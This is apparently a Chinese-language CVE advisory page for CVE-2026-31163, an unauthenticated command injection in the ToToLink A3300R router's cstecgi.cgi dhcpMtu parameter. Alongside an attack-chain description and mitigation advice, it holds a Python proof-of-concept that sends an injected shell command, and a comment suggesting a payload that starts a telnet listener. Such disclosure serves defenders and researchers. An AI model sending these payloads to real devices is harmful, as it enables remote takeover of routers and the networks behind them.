CVE-2026-31163 CVSS 6.5 中危

CVE-2026-31163 ToToLink A3300R 命令注入漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31163

漏洞类型

命令注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ToToLink A3300R

漏洞概述

ToToLink A3300R 路由器固件版本 v17.0.0cu.557_B20221024 中存在一个命令注入漏洞。该漏洞源于设备 Web 管理接口 /cgi-bin/cstecgi.cgi 在处理 dhcpMtu 参数时未能正确过滤用户输入。攻击者可利用此缺陷，在无需身份认证的情况下，通过构造特制的 HTTP 请求注入恶意操作系统命令。成功利用该漏洞可能导致攻击者获取设备控制权，进而窃取敏感数据或中断网络服务。

技术细节

漏洞位于 ToToLink A3300R 固件的 Web 管理组件 `cstecgi.cgi` 中。其核心问题在于程序直接信任并处理来自客户端的 `dhcpMtu` 参数。当组件尝试根据该参数更新 DHCP 配置时，它未对输入内容进行严格的合法性校验或过滤，而是直接将其拼接到底层的系统命令字符串中，随后调用 `system()` 等高危函数执行。攻击者可以通过注入 Shell 元字符（如分号 `;`、反引号 `` ` `` 或管道符 `|`）来截断原本的命令逻辑并附加任意恶意指令。鉴于该漏洞无需用户交互且无需身份认证，远程攻击者只需向目标接口发送特制的 HTTP POST 请求即可触发攻击。由于嵌入式 Web 服务通常以 Root 权限运行，一旦攻击成功，攻击者即可在目标设备上执行任意系统命令，完全控制设备。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别目标 ToToLink A3300R 设备及其固件版本。

STEP 2

2. 发送恶意请求

攻击者向 /cgi-bin/cstecgi.cgi 发送包含恶意 payload 的 HTTP POST 请求，利用 dhcpMtu 参数注入命令。

STEP 3

3. 命令执行

服务器端 CGI 程序未过滤输入，直接将 payload 传递给 system() 函数执行。

STEP 4

4. 获取控制权

注入的命令在设备上运行（通常为 root 权限），攻击者获得 Shell 或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual IP of the router)
target_url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

# Vulnerable parameter: dhcpMtu
# Payload injection: Using semicolon to chain a simple command (e.g., creating a file or telnet)
# Example: ;telnetd -p 2323&
payload = "; touch /tmp/poc_success;"

# Constructing the POST data
# Note: Other parameters might be required depending on the specific form structure
data = {
    "dhcpMtu": payload,
    "action": "0"  # Example action value, may vary based on firmware logic
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, data=data, headers=headers, timeout=5)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text[:100]}")
        print("[+] Check if the command was executed on the target device.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

ToToLink A3300R v17.0.0cu.557_B20221024

防御指南

临时缓解措施

建议用户立即检查设备固件版本，并前往 ToToLink 官网下载更新补丁。在无法立即升级的情况下，应关闭路由器的远程 Web 管理功能，仅允许通过内网访问管理页面，以降低被远程攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表